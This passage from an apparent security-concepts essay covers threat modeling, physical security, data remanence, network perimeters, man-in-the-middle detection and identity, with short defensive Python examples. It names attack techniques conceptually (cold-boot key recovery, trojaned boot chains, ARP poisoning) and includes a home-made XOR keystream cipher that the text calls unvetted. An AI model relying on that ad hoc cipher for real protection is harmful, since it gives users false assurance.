software). Modeling these is called threat modeling (http://en.wikipedia.org/wiki/Threat_model).
In attacker-centric threat modeling, the implicit assumptions are
that you have a limited budget and the number of threats is so large
that you cannot defend against all of them. So you now need to decide
where to allocate your resources. Part of this involves trying to
figure out who your adversaries are and what their capabilities and
intentions are, and thus how much to worry about particular domains
of knowledge or technology. You don't have to know their name, location
and social security number; it can be as simple as "some high
school student on the Internet somewhere who doesn't like us", "a
disgruntled employee" (as opposed to a gruntled employee), or "some
sexually frustrated script-kiddie on IRC who doesn't like the fact
that he is a jerk who enjoys abusing people and therefore his only
friends are other dysfunctional jerks like him". People in charge
of doing attacker-centric threat modeling must understand their
adversaries and be willing to take chances by allocating resources
against an adversary which hasn't actually attacked them yet, or else
they will always be defending against yesterday's adversary, and get
caught flat-footed by a new one.
4.1 Common Psychological Errors
The excellent but poorly titled1 book Searching for Happiness tells us that we make two common
kinds of errors when reasoning about other humans:
- Overly different; if you looked at grapes all day, you'd know a hundred
different kinds, and naturally think them very different. But they
all squish when you step on them, they are all fruits and frankly,
not terribly different at all. So too we are conditioned to see people
as different because the things that matter most to us, like finding
an appropriate mate or trusting people, cannot be discerned with questions
like "do you like breathing?". An interesting experiment showed
that a description of how they felt by people who had gone through
a process is more accurate in predicting how a person will feel after
the process than a description of the process itself. Put another
way, people assume that the experience of others is too dependent
on the minor differences between humans that we mentally exaggerate.
- Overly similar; people assume that others are motivated by the same
things they are motivated by; we project onto them a reflection of
our self. If a financier or accountant has ever climbed Mount Everest,
I am not aware of it. Surely it is a cost center, yes?
4.2 Cost-Benefit
Often, the lower layers of the security hierarchy cost more to build
out than the higher levels. Physical security requires guards, locks,
iron bars, shatterproof windows, shielding, and various other things
which, being physical, cost real money. On the other hand, network
security may only need a free software firewall. However, what an
adversary could cost you during a physical attack (e.g. a burglar
looting your home) may be greater than an adversary could cost you
by defacing your web site.
4.3 Risk Tolerance
We may assume that the distribution of risk tolerance among adversaries
is monotonically decreasing; that is, the number of adversaries who
are willing to try a low-risk attack is greater than the number of
adversaries who are willing to attempt a high-risk attack to get the
same result. Beware of risk evaluation though; while a hacker may
be taking a great risk to gain access to your home, local law enforcement
with a valid warrant is not going to be risking as much.
So, if you are concerned about a whole spectrum of adversaries, known
and unknown, you may wish to have greater network security than physical
security, simply because there are going to be more remote attacks.
4.4 Capabilities
You only have to worry about things to the extent they may lie within
the capabilities of your adversaries. It is rare that adversaries
use outside help when it comes to critical intelligence; it could,
for all they know, be disinformation, or the outsider could be an
agent-provocateur.
4.5 Sophistication Distribution
If they were capable, honest, and hard-working, they wouldn't need
to steal.
Along similar lines, one can assume a monotonically decreasing number
of adversaries with a certain level of sophistication. My rule of
thumb is that for every person who knows how to perform a technique,
there are x people who know about it, where x
is a small number, perhaps 3 to 10. The same rule applies to people
with the ability to write an exploit versus those able to download
and use it (the so-called script kiddies). Once an exploit
is coded into a worm, the chance of a compromised host having been
compromised by the worm (instead of a human who targets it specifically)
approaches 100%. Discuss Bayesian inference.
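The worm-versus-human claim above is an instance of Bayes' rule, and a small calculation makes it concrete. The following is a minimal sketch, not a measurement: the function name, the attempt counts, and the success probabilities are all invented for illustration.

```python
def posterior_worm(worm_attempts: float, human_attempts: float,
                   p_success_worm: float, p_success_human: float) -> float:
    """P(worm | host compromised) by Bayes' rule.

    The priors are proportional to how many attempts each source makes;
    the likelihoods are the per-attempt success probabilities.
    """
    worm = worm_attempts * p_success_worm
    human = human_attempts * p_success_human
    return worm / (worm + human)


# Hypothetical numbers: the worm probes the host 10,000 times for every
# single targeted human attempt, with equal per-attempt success odds.
print(round(posterior_worm(10_000, 1, 0.5, 0.5), 4))  # 0.9999
```

Even if the human were far more skilled per attempt, the sheer volume of automated attempts dominates the result, which is the point of the paragraph above.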
4.6 Goals
We've all met or know about people who would like nothing more than
to break things, just for the heck of it; schoolyard bullies who feel
hurt and want to hurt others, or their overgrown sadist kin. Vandals
who merely want to write their name on your storefront. A street thug
who will steal a cell phone just to throw it through a window. I'm
sure the sort of person reading this isn't like that, but unfortunately
some people are. What exactly are your adversary's goals? Are they
to maximize ROI (Return On Investment) for themselves, or are they
out to maximize pain (tax your resources) for you? Are they monetarily
or ideologically motivated? What do they consider investment? What
do they consider a reward? Put another way, you can't just assign
a dollar value on assets, you must consider their value to the adversary.
5 Physical Security
When people think of physical security, they often think no further than
on the strength of access control devices; I recall a story of a cat
burglar who used a chainsaw to cut through victim's walls, bypassing
any access control devices. I remember reading someone saying that
a deep space probe is the ultimate in physical security.
5.1 No Physical Security Means No Security
A couple of limitations come up without physical security for a system.
For confidentiality, all of the sensitive data needs to be encrypted.
But even if you encrypt the data, an adversary with physical access
could trojan the OS and capture the data (this is a control attack
now, not just confidentiality breach; go this far and you've protected
against overt seizure, theft, improper disposal and such). So you'll
need to protect the confidentiality and integrity of the OS. If you
protect the OS, he trojans the kernel. If you protect the kernel, he
trojans the boot loader. If you protect the boot loader (say by putting
it on a removable
medium), he trojans the BIOS. If you protect the BIOS, he trojans
the CPU. So you put a tamper-evident label on it, with your signature
on it, and check it every time. But he can install a keyboard logger.
So suppose you make a sealed box with everything in it, and connectors
on the front. Now he gets measurements and photos of your machine,
spends a fortune replicating it, replaces your system with an outwardly
identical one of his design (the trojan box), which communicates (say,
via encrypted spread-spectrum radio) to your real box. When you type
plaintext, it goes through his system, gets logged, and relayed to
your system as keystrokes. Since you talk plaintext, neither of you
are the wiser.
The physical layer is a common place to facilitate a side-channel
attack (see 21.2).
5.2 Data Remanence
Data remanence is the residual physical representation of your
information on media after you believe that you have removed it (definition
thanks to Wikipedia, http://en.wikipedia.org/wiki/Data_remanence).
This is a disputed region of technology, with a great deal of speculation
and many self-styled experts, but very little hard science.
As of 2006, the most definitive study seems to be the NIST Computer
Security Division paper Guidelines for Media Sanitization (http://csrc.nist.gov/publications/nistpubs/800-88/NISTSP800-88_rev1.pdf).
NIST is known to work with the NSA on some topics, and this may be
one of them. It introduces some useful terminology:
- disposing is the act of discarding media with no other considerations
- clearing is a level of media sanitization that resists anything
you could do at the keyboard or remotely, and usually involves overwriting
the data at least once
- purging is a process that protects against a laboratory attack
(signal processing equipment and specially trained personnel)
- destroying is the ultimate form of sanitization, and means that
the medium can no longer be used as originally intended
5.2.1 Magnetic Storage Media (Disks)
The seminal paper on this is Peter Gutmann's Secure Deletion
of Data from Magnetic and Solid-State Memory (http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html).
In early versions of his paper, he speculated that one could extract
data due to hysteresis effects even after a single overwrite, but
on subsequent revisions he stated that there was no evidence a single
overwrite was insufficient. Simson Garfinkel wrote about it recently
in his blog (https://www.techreview.com/blog/garfinkel/17567/).
The NIST paper has some interesting tidbits in it. Obviously, disposal
cannot protect confidentiality of unencrypted media. Clearing is probably
sufficient security for 99% of all data; I highly recommend Darik's
Boot and Nuke (http://dban.sourceforge.net/), which is a bootable
floppy or CD based on Linux. However, it cannot work if the storage
device stops working properly, and it does not overwrite sectors or
tracks marked bad and transparently relocated by the drive firmware.
With all ATA drives over 15GB, there is a "secure erase" ATA
command which can be accessed from hdparm within Linux, and Gordon
Hughes has some interesting documents and a Microsoft-based utility
(http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml). There's
a useful blog entry about it (http://storagemojo.com/2007/05/02/secure-erase-data-security-you-already-own/).
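To illustrate what "clearing" by overwriting means at the smallest scale, here is a minimal sketch that overwrites a single file once, in place, with random bytes. It is an assumption-laden illustration, not a replacement for the whole-device tools named above: the function name clear_file is hypothetical, and on journaling or copy-on-write filesystems, or on media with wear leveling or remapped sectors, older copies of the data may survive outside the file's current blocks.

```python
import os


def clear_file(path: str, chunk_size: int = 1 << 20) -> int:
    """Overwrite a file's contents once with random bytes, in place.

    Returns the number of bytes overwritten. The file keeps its name
    and length; only its current data blocks are rewritten.
    """
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        remaining = size
        while remaining > 0:
            n = min(chunk_size, remaining)
            f.write(os.urandom(n))
            remaining -= n
        f.flush()
        os.fsync(f.fileno())  # ask the OS to push the new data to the device
    return size
```

The same caveat the text gives for whole-disk tools applies here: a single pass only touches what the device and filesystem expose at that moment.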
In the case of very damaged disks, you may have to resort to physical
destruction. However, with disk densities being what they are, even
1/125" of a disk platter may hold a full sector, and someone with
absurd amounts of money could theoretically extract small quantities
of data. Fortunately, nobody cares this much about your data.
Now, you may wonder what you can do about very damaged disks, or what
to do if the media isn't online (for example, you buried it in an
underground bunker), or if you have to get rid of the data fast. I
would suggest that encrypted storage (see 19.7)
would almost always be a good idea. If you use it, you merely have
to protect the confidentiality of the key, and if you can properly
sanitize the media, all the better. Recently Simson Garfinkel re-discovered
a technique for getting the data off broken drives; freezing them.
Another technique that I have used is to replace the logic board with
one from a working drive.
5.2.2 Semiconductor Storage (RAM)
Peter Gutmann's Data Remanence in Semiconductor Devices (http://www.cypherpunks.to/~peter/usenix01.pdf)
shows that if a particular value is held in RAM for extended periods
of time, various processes such as electromigration make permanent
changes to the semiconductor's structure. In some cases, it is possible
for the value to be "burned in" to the cell, such that it cannot
hold another value.
Recently a Princeton team (http://citp.princeton.edu/memory/)
found that the values held in DRAM decay in predictable ways after
power is removed, such that one can merely reboot the system and recover
keys for most encrypted storage systems (http://citp.princeton.edu/pub/coldboot.pdf).
This generated much talk in the industry. This prompted an interesting
overview of attacks against encrypted storage systems (http://www.news.com/8301-13578_3-9876060-38.html).
6 Distributed Systems
The objects involved in network security are called nodes.
One can talk about networks composed of humans (social networks),
but that's not the kind of network we're talking about here. Often
in network security the adversary is assumed to control the network;
this is a bit of a holdover from the days when the network was radio,
or when the node was an embassy in a country controlled by the adversary.
In modern practice, this doesn't seem to usually be the case, but
it'd be hard to know for sure. In network security we almost always
assume the adversary controls at least one of the nodes on the network.
In network security, we can lure an adversary to a system,
tempt them with something inviting; such a system is called a honeypot,
and a network of such systems is sometimes called a honeynet.
A honeypot may or may not be instrumented for careful monitoring;
sometimes systems so instrumented are called fishbowls, to
emphasize the transparent nature of activity within them. Often one
doesn't want to allow a honeypot to be used as a launch point for
attacks, so outbound network traffic is sanitized or scrubbed;
if traffic to other hosts is blocked completely, some people call
it a jail, but that is also the name of an operating system
security technology used by FreeBSD, so I consider it confusing.
To reduce a distributed system problem to a physical security (see
5) problem, you can use an air gap,
or sneakernet between one system and another. However, the
data you transport between them may be capable of exploiting the offline
system. One could keep a machine offline except during certain windows;
this could be as simple as a cron job which turns on or off the network
interface via ifconfig. However, an offline system may be difficult
to administer, or keep up-to-date with security patches.
6.1 Cryptography is the Sine Qua Non of Secure Distributed Systems
All cryptography lets you do is create trust relationships across
untrustworthy media; the problem is still trust between endpoints
and transitive trust.
- Marcus Ranum
Put simply, you can't have a secure distributed system (with the normal
assumptions of untrusted nodes and network links potentially controlled
by the adversary) without using cryptography somewhere ("sine
qua non" is Latin for "without which it could not be"). If
the adversary can read communications, then to protect the confidentiality
of the network traffic, it must be encrypted. If the adversary can
modify network communication, then it must have its integrity protected
and be authenticated (that is, to have the source identified). Even
physical layer communication security technologies, like the KLJN
cipher, quantum cryptography, and spread-spectrum communication, use
cryptography in one way or another.
I would go farther and say that basing network security decisions
on anything other than cryptographic keys is never going to be as
strong as basing them on cryptography. Very few Internet adversaries
currently have the capability to arbitrarily route data around. Most
cannot jump between VLANs on a tagged port. Some don't even have the
capability to sniff on their LAN. But none of the mechanisms preventing
this are stronger than strong cryptography, and often they are much
weaker, possibly only security through obscurity. Let me put it to
you this way; to support a general argument otherwise, think about
how much assurance a firewall has that a packet claiming to be from
a given IP address is actually from the system the firewall maintainer
believes it to be. Often these things are complex, and way beyond
his control. However, it would be totally reasonable to filter on
IP address first, and only then allow a cryptographic check; this
makes it resistant to resource consumption attacks from anyone who
cannot spoof a legitimate IP address (see 3.2.1).
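The ordering described above (cheap address filter first, cryptographic check second) can be sketched as follows. This is a minimal illustration under stated assumptions: the allowed network, the shared key, and the function names are hypothetical, and an HMAC over the message stands in for whatever cryptographic authentication a real protocol would use.

```python
import hashlib
import hmac
import ipaddress

# Hypothetical configuration, for illustration only.
ALLOWED_NETS = [ipaddress.ip_network("192.0.2.0/24")]
SHARED_KEY = b"example key, not for real use"


def ip_allowed(source_ip: str) -> bool:
    """Cheap pre-filter: is the claimed source address in an allowed network?"""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in ALLOWED_NETS)


def accept(source_ip: str, message: bytes, tag: bytes) -> bool:
    """Filter on IP address first, then decide cryptographically."""
    if not ip_allowed(source_ip):
        return False  # dropped before spending any effort on cryptography
    expected = hmac.new(SHARED_KEY, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)
```

The address check adds no real assurance about identity; it only limits who can make the system spend cycles on the expensive check. The decision that matters is the comparison of the authentication tag.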
6.2 Hello, My Name is 192.168.1.1
Humans are incapable of securely storing high-quality cryptographic
keys, and they have unacceptable speed and accuracy when performing
cryptographic operations. (They are also large, expensive to maintain,
difficult to manage, and they pollute the environment. It is astonishing
that these devices continue to be manufactured and deployed. But they
are sufficiently pervasive that we must design our protocols around
their limitations).
- Network Security / PRIVATE Communication in a PUBLIC World by Charlie
Kaufman, Radia Perlman, & Mike Speciner (Prentice Hall 2002; p.237)
Because humans communicate slowly, in plaintext, and don't plug
into a network, we consider the nodes within the network to be computing
devices. The system a person interacts with has equivalency with them;
break into the system administrator's console, and you have access
to anything he or she accesses. In some cases, you may have access
to anything he or she can access. You may think that your LDAP
or Kerberos server is the most important, but isn't the node of the
guy who administers it just as critical? This is especially true if
OS security is weak and any user can control the system, or if the
administrator is not trusted, but it is also convenient because packets
do not have user names, just source IPs. When some remote system connects
to a server, unless both are under the control of the same entity,
the server has no reason to trust the remote system's claim about
who is using it, nor does it have any reason to treat one user on
the remote system different than any other.
6.3 Source Tapping; The First Hop and Last Mile
One can learn a lot more about a target by observing the first link
from them than from some more remote place. That is, the best vantage
point is one closest to the target. For this reason, the first hop
is far more critical than any other. An exception may involve a target
that is more network-mobile than the eavesdropper. The more common
exception is tunneling/encryption (to include tor and VPN technologies);
these relocate the first hop somewhere else which is not physically
proximate to the target's meat space coordinates, which may make it
more difficult to locate.
Things to consider here involve the difficulty of interception, which
is a secondary concern (it is never all that difficult). For example,
it is probably less confidential from the ISP to use an ISP's caching
proxy than to access the service directly, since most proxy software
makes it trivial to log the connection and content; however, one should
not assume that one is safe by not using the proxy (especially now
that many do transparent proxying). However, it is less anonymous
from the remote site to access the remote site directly; using the
ISP's proxy affords some anonymity (unless the remote site colludes
with the ISP).
6.4 Security Zones
The firewall was originally defined as a device between different
networks that had different security characteristics; it was named
after the barrier between a car interior and the engine, which is
designed to prevent an engine fire from spreading to the cabin. Demilitarized
zones (DMZs) were originally defined as an area outside the firewall
but inside a border router, then as a separate leg of the firewall,
and now in a variety of ways. An untrusted network may be the
Internet, or a wifi network, or a network with public access. What
these definitions all have in common is that they define a security
zone (this term thanks to the authors of Extreme Exploits),
or the barrier between security zones. I believe this concept, that
of a security zone where all the nodes inside have roughly equivalent
access to or from other security zones, is the most important and
fundamental way of thinking of network security. Do not confuse this
with the idea that all the systems in the zone have the same relevance
to the network's security, or that the systems have the same impact
if compromised (for example, your site's DNS servers may be in the
same zone as desktops); that is a complication and more of a matter
of operating system security than network security.
6.5 Security Equivalent Things Go Together
One issue that always seems to come up is availability versus other
goals. For example, suppose you install a new biometric voice recognition
system. Then you have a cold and can't get in. Did you prioritize
correctly? Which is more important? Similar issues come up in almost
every place with regard to security. For example, your system may
authenticate users versus a global server, or it may have a local
database for authentication. The former means that one can revoke
a user's credentials globally immediately, but also means that if
the global server is down, nobody can authenticate. Attempts to get
the best of both worlds ("authenticate locally if global server
is unreachable") often reduce to availability (the adversary just DoSes
the link between system and global server to force local authentication).
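The weakness of the fallback scheme is easy to see in a toy model. The sketch below is hypothetical throughout: the function, the user sets, and the global_reachable flag are invented for illustration, and a real system would check credentials rather than bare user names.

```python
def authenticate(user, global_users, local_users, global_reachable):
    """'Authenticate locally if the global server is unreachable.'

    global_users and local_users are hypothetical sets of currently
    valid user names.
    """
    if global_reachable:
        return user in global_users
    return user in local_users  # stale copy: revocations may be missing


global_users = {"alice"}          # bob has been revoked globally
local_users = {"alice", "bob"}    # the local copy has not caught up

print(authenticate("bob", global_users, local_users, global_reachable=True))   # False
print(authenticate("bob", global_users, local_users, global_reachable=False))  # True
```

Whoever can make global_reachable false, for instance by flooding the link, gets to choose which database is consulted.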
My philosophy on this is simple; put like things together. That is,
I think authentication information for a system should be on the system.
That way, the system is essentially a self-contained unit. By spreading
the data out, one multiplies potential attack targets, and reduces
availability. If someone can hack the local system, then being able
to alter a local authentication database is relatively insignificant.
6.6 Outsider Threats vs. Insider Threats
The perimeter is not here nor there, but it is inside you, and among
you.
Most organizations consider the unauthenticated and unauthorized person
on the Internet to be the largest threat, and despite hype to the
contrary, I believe this is correct. Most people are trustworthy for
the sorts of things we trust them for, and if they weren't, society
would probably collapse. The difference is that on the Internet, the
pool of potential adversaries is much larger, and while a person can
only hold one job, they can easily hack into many different organizations.
The veterans (and critics) of Usenet and IRC are well aware of this,
where the unbalanced tend to be most vocal and most annoying. Some
of them seem to have no goal other than to irritate others. In the
real world, people learn to avoid these sorts, and employers choose
not to hire them, but on the Internet, it's a bit more difficult to
filter out the chaff, so to speak. Also, if we detect a misbehaving
insider, we can usually identify and therefore punish them; by contrast,
it is difficult to take a simple IP address and end up with a successful
lawsuit or criminal case, particularly if the IP is in another country.
Essentially, perimeter defenses protect against most adversaries,
whereas distributed defenses on each host protect against all adversaries
(that is, remote systems; local users are the domain of OS security).
The idea of pointing outward versus pointing inward is a well-known
one in alarm systems. Your typical door and window sensors are perimeter
defenses, and the typical motion detector or pressure mat an internal
defense. As with alarm systems, the internally-focused defenses are
prone to triggering on authorized activity, whereas the perimeter
defenses are less so.
However, I am beginning to think that perimeter defenses are insufficient.
As we become more networked, we will have more borders with more systems.
End-to-end protocol encryption and VPNs prevent any sort of application-layer
data inspection by NIDS devices located at choke points and gateways.
High-speed networks, particularly fiber to the desktop, challenge
our ability to centralize, inspect, and filter traffic, and require
expensive, high-performance equipment. Tunneling and firewall-penetrating
technologies like Skype create tunnels (some may say covert channels)
through the firewall. Put simply, "the perimeter is everywhere",
and the forward-looking should consider how to distribute our security
over our assets. For example, everything that is done by a NIDS can
be done on the endpoint, and it doesn't suffer from many of the typical
problems that a separate device does (including evasion techniques
and interpretation ambiguities). Also, this means each internal node
pays for its own security; if I am downloading 1Gbps, I am also inspecting
it, whereas an idle system isn't spending any cycles inspecting traffic.
With the proper design, no packets get lost, dropped, or ignored,
nor is it necessary to limit bandwidth because of limited inspection
capacity at the perimeter. And we can use commodity hardware (the
hardware we already have) to do the work.
Another important issue to consider is series versus parallel defenses
(see 24.8). Suppose the gateway, firewall, and
VPN endpoint for your organization's main office uses the pf firewall
(IMHO, the best open-source firewall out there). Now, suppose a remote
office wants to connect in from Linux, so they use iptables. Now,
should there be an exploitable weakness in iptables, then an adversary
might be able to penetrate the remote office, putting them inside its perimeter.
Courtesy of the VPN tunnel, they are now inside the perimeter of the
main office as well, and your perimeter security is worthless. Given
the trend towards a more complex and convoluted perimeter, I think
this suggests moving away from perimeter defenses and towards distributed
defenses; we can start by creating concentric perimeters, or firewalls
between internal networks, and move towards (the ideal but probably
unreachable goal of) a packet filter on every machine, implementing
least privilege on every system.
A hardware security module (HSM) basically makes everyone but the
vendor an outsider; insurance companies love HSMs because they defend
against insider threats as well as outsiders.
Dave G. of Matasano has published an interesting piece on the insider
threat (http://www.matasano.com/log/984/the-insidious-insider-threat/).
6.7 A Proposed Perimeter Defense
I believe the following would be a useful design for perimeter
defenses for most organizations and individuals. First, there would
be an outer layer of reactive prevention, followed by an inner layer
of prevention and detection that acts as a fail-safe mechanism. If
the outer preventative defense should fail for some reason (hardware,
software, configuration) then incoming connections will be stopped
by the inner layer and the detection will notify us that something
is wrong. The idea of a dual layer of firewalling is already becoming
popular with financial institutions and military networks, but really
derives from the lessons learned trying to guarantee high availability
and specifically the goal of eliminating single points of failure.
This system also doesn't require monitoring traffic blocked by the
outer layer, which virtually eliminates the resources it takes to
monitor traffic that gets blocked anyway. However, if the outer layer
were not reactive, then we would effectively be discarding any useful
intelligence that is gained by detecting probes (that is, a failed
connection or attack is still valuable in determining intent).
With a reactive firewall as the outer layer, when an adversary probes
our defenses looking for holes or weak spots, we take appropriate
action, usually shunning that network address, and this makes enumeration
a much more difficult process. With a little imagination, we can construct
more deceptive defensive measures, like returning random responses,
or redirection to a honey-net (which is essentially just a consistent
set of bogus responses, plus monitoring). Since enumeration is strictly
an information-gathering activity, the obvious countermeasure is deception.
The range of deceptive responses runs from none (that is, complete
silence, or lack of information) through random responses (misinformation)
to consistent, strategic deception (disinformation). Stronger responses
are out of proportion to the provocation (network scans are legal
in most countries), and often illegal in any circumstances.
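The simplest reactive response described above, shunning an address that probes for holes, can be sketched as a small state machine. This is an illustrative model only: the class name, the threshold, and the idea of counting distinct closed ports are assumptions, not a description of any particular firewall product.

```python
from collections import defaultdict


class ReactiveFilter:
    """Shun a source address after it probes too many closed ports."""

    def __init__(self, open_ports, threshold=3):
        self.open_ports = set(open_ports)
        self.threshold = threshold        # hypothetical tuning knob
        self.probes = defaultdict(set)    # source -> closed ports it tried
        self.shunned = set()

    def handle(self, source, port):
        """Return True if the connection attempt should be allowed."""
        if source in self.shunned:
            return False                  # complete silence for shunned sources
        if port in self.open_ports:
            return True
        self.probes[source].add(port)
        if len(self.probes[source]) >= self.threshold:
            self.shunned.add(source)
        return False


fw = ReactiveFilter(open_ports={22, 443})
for port in (21, 23, 25):                 # a short scan of closed ports
    fw.handle("203.0.113.9", port)
print(fw.handle("203.0.113.9", 443))      # False: the scanner is now shunned
print(fw.handle("198.51.100.4", 443))     # True: other sources are unaffected
```

Once shunned, the scanner learns nothing further, even about ports that are really open, which is what makes enumeration harder. One caveat of any such scheme is that if source addresses can be spoofed, an adversary may be able to get a legitimate address shunned.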
6.8 Man In The Middle
How do we detect MITM or impersonation in web, PGP/GPG, SSH contexts?
The typical process for creating a connection involves a DNS resolution
at the application layer (unless you use IP addresses), then sending
packets to the IP address (at the network layer), which have to be
routed; at the link layer, ARP typically is used to find the next
hop at each stage.
6.8.1 DNS Issues
Poisoning, spoofing (transaction ID issues), or maybe you are querying
a DNS server the adversary controls (e.g. your ISP's)
6.8.2 IP Routing
Announcing bogus routes, or topological considerations
6.8.3 Link-layer Issues
ARP poisoning (dsniff)
6.8.4 Physical Layer
Tapping the wire (or listening to wireless)
6.8.5 Periodic Rechecking
It's difficult to stay perpetually in the middle. When you aren't,
typically, the cryptographic fingerprints will no longer match and
the MITM will be detected. It's handy to occasionally compare them
using different channels, so that if the ones you originally relied
upon were proxied, the tampering will be detected. SSH rechecks automatically
by remembering each host key; this is called the baby duck model (i.e. it
bonds to the first thing it sees, and complains if it changes identities).
However, this detects the problem only retroactively.
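The baby duck model can be sketched in a few lines. This is a minimal
illustration, not how any SSH implementation stores its keys; the
KnownHosts class and the sample key bytes are hypothetical.

```python
import hashlib


class KnownHosts:
    """Remember the first key fingerprint seen for each host (baby duck model)."""

    def __init__(self):
        self.fingerprints = {}              # host name -> hex fingerprint

    def check(self, host, public_key_bytes):
        fp = hashlib.sha256(public_key_bytes).hexdigest()
        known = self.fingerprints.get(host)
        if known is None:
            self.fingerprints[host] = fp    # first contact: bond to it
            return "new"
        return "match" if known == fp else "CHANGED"


hosts = KnownHosts()
first = hosts.check("example.org", b"key-A")
second = hosts.check("example.org", b"key-A")
third = hosts.check("example.org", b"key-B")
```

Note that the first call can only answer "new"; if the adversary was
already in the middle at that moment, the wrong key is what gets
remembered.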
6.8.6 Out-of-Band Comparison
One can compare digests/fingerprints/hashes over a different, low-bandwidth
communication medium (e.g. the phone, postal mail).
6.8.7 Parallel Paths
OOB comparison is really an example of creating two disjoint paths
between two entities and making sure that they give the same results.
This can occur in multiple contexts. For example, it can be used for
the bootstrapping problem: how can I trust the first connection? By
creating two paths I can compare the identity the peer presents on each.
I once used this to check the integrity of a PGP download by fetching
it from home and from another location, and comparing the results.
TODO: show a diagram of what I mean here.
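The download comparison above amounts to hashing each copy and checking
that the digests agree. A minimal sketch, assuming SHA-256 as the digest
and using made-up byte strings in place of real downloads:

```python
import hashlib
import hmac


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def paths_agree(copies) -> bool:
    """True if every copy, fetched over a different path, has the same digest."""
    digests = [digest(c) for c in copies]
    return all(hmac.compare_digest(digests[0], d) for d in digests[1:])


from_home = b"pgp-release-bytes"
from_elsewhere = b"pgp-release-bytes"
tampered = b"pgp-release-bytes-with-backdoor"

same = paths_agree([from_home, from_elsewhere])
differs = paths_agree([from_home, tampered])
```

Agreement only helps to the extent that the paths really are disjoint;
an adversary sitting close to the server sees both.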
6.8.8 Formatting
Imagine that the adversary is conducting a MITM against, say, an SSH
session, so instead of A<->B it is A<->O<->B. Your countermeasure
as A may be to check the IP addresses of the peer at B, so that the
adversary would have to spoof IPs in both directions (this is often
printed automatically at login). Another technique is to check the
host key fingerprint as part of your login sequence, sending the fingerprint
through the tunneled connection. The adversary may modify the data
at the application layer automatically, to change the fingerprint
on the way through. But what if you transformed (e.g. encrypted) the
fingerprint using a command-line tool, and represented it as printable
characters, and printed them through the tunnel, and inverted the
transformation at the local end? Then he'd have a very difficult time
writing a program to detect this, especially if you kept the exact
mechanism a secret. You could run the program automatically through
ssh, so it isn't stored on the remote system.
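One possible shape for such a transformation is sketched below. The
mask and unmask functions and the keystream construction are
hypothetical and chosen only for illustration; this is not a vetted
cipher, and its value here rests on the adversary not anticipating it.

```python
import base64
import hashlib


def _keystream(secret: bytes, length: int) -> bytes:
    # Hypothetical keystream: SHA-256 in counter mode. Illustration only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(secret + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def mask(fingerprint: str, secret: bytes) -> str:
    """Remote end: emit the fingerprint as opaque printable characters."""
    raw = fingerprint.encode()
    masked = bytes(a ^ b for a, b in zip(raw, _keystream(secret, len(raw))))
    return base64.b64encode(masked).decode()


def unmask(printable: str, secret: bytes) -> str:
    """Local end: invert the transformation."""
    masked = base64.b64decode(printable)
    raw = bytes(a ^ b for a, b in zip(masked, _keystream(secret, len(masked))))
    return raw.decode()


fp = "SHA256:abc123"
wire = mask(fp, b"shared secret")
recovered = unmask(wire, b"shared secret")
```

Because the same secret always yields the same output for the same
fingerprint, a patient adversary could learn and replay it; mixing a
fresh value chosen by the local end into the secret on each login would
be one way to address that.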
7 Identification and Authentication
Identification is necessary before making any sort of access control
decisions. Often it can reduce abuse, because an identified individual
knows that if they do something there can be consequences or sanctions.
For example, if an employee abuses the corporate network, they may
find themselves on the receiving end of the sysadmin's luser attitude
readjustment tool (LART). I tend to think of authentication as a process
you perform on objects (like paintings, antiques, and digitally signed
documents), and identification as a process that subjects (people)
perform, but in network security you're really looking at data created
by a person for the purpose of identifying them, so I use them interchangeably.
7.1 Identity
Sometimes I suspect I'm not who I think I am.
- Ghost in the Shell
An identity, for our purposes, is an abstract concept; it does
not map to a person, it maps to a persona. Some people call
this a digital ID, but since this paper doesn't talk about
non-digital identities, I'm dropping the qualifier. Identities are
different from credentials, which are something you use to
prove identity. For example, your login password is a credential.
In relational database design, it is considered a good practice for
the primary key (http://en.wikipedia.org/wiki/Primary_key)
of a table to be an integer, perhaps a row number, that is not used
for anything else. That is because the primary key is used as an identifier
for the row. An identifier is shorthand, a handle; like a pointer,
it allows us to modify the object itself, so that the modification
occurs in all places simultaneously. Most competent DBAs realize that
people change names, phone numbers, locations, and so on; they may
even change social security numbers. They also realize that people
may share any of these things (even social security numbers are not
necessarily unique, especially if they lie about it). So to be able
to identify a person across any of these changes, you need to use
a row number. The exact same principle applies with security systems.
In Unix, a person is given a username (identity) and a password (credential).
This is good, because the password may be changed without losing the
idea of the identity of the person. However, there are subtle gotchas.
In actuality, the username is mapped to a user ID (UID), which is
the real way that Unix keeps track of identity. It isn't necessarily
a one-to-one mapping. Also, a poor system administrator may reassign
an unused user ID without going through the file system and looking
for files owned by the old user, in which case their ownership is
silently reassigned.
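Before reusing a user ID, one can walk the file system looking for
files still owned by it. The following is a minimal sketch; the
function name orphaned_files is hypothetical, and on a real Unix system
the set of known UIDs could be built with the standard pwd module, for
example {p.pw_uid for p in pwd.getpwall()}.

```python
import os


def orphaned_files(root, known_uids):
    """Yield paths under root whose owning UID is not in known_uids."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                uid = os.lstat(path).st_uid   # lstat: do not follow symlinks
            except OSError:
                continue                      # vanished or unreadable; skip
            if uid not in known_uids:
                yield path
```

Anything this reports would silently become the property of whoever is
next assigned that UID.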
PGP and GPG made the mistake of using a cryptographic key as an identifier.
If one has to revoke that key, one basically loses anything (such
as signatures) which applied to that key, and the trust that other
people have indicated towards that key. And if you have multiple keys,
friends of yours who have all of them cannot treat them all as equivalent,
since GPG can't be told that they are associated to the same identity,
because the keys are the identity. Instead, they must manage
statements about you (such as how much they trust you to act as an
introducer) on each key independently.
7.2 What Authority?
Does it follow that I reject all authority? Far from me such a thought.
In the matter of boots, I refer to the authority of the bootmaker;
concerning houses, canals, or railroads, I consult that of the architect
or the engineer.
- Mikhail Bakunin, What is Authority? 1882 (http://www.panarchy.org/bakunin/authority.1871.html)
When we are attempting to identify someone, we are relying upon some
authority, usually the state government. When you register a domain
name with a registrar, they record your personal information in the
WHOIS database; this is the system of record (http://en.wikipedia.org/wiki/System_of_record).
No matter how careful we are, we can never have a higher level of
assurance than this authority has. If the government gave that person
a false identity, or the person bribed a DMV clerk to do so, we can
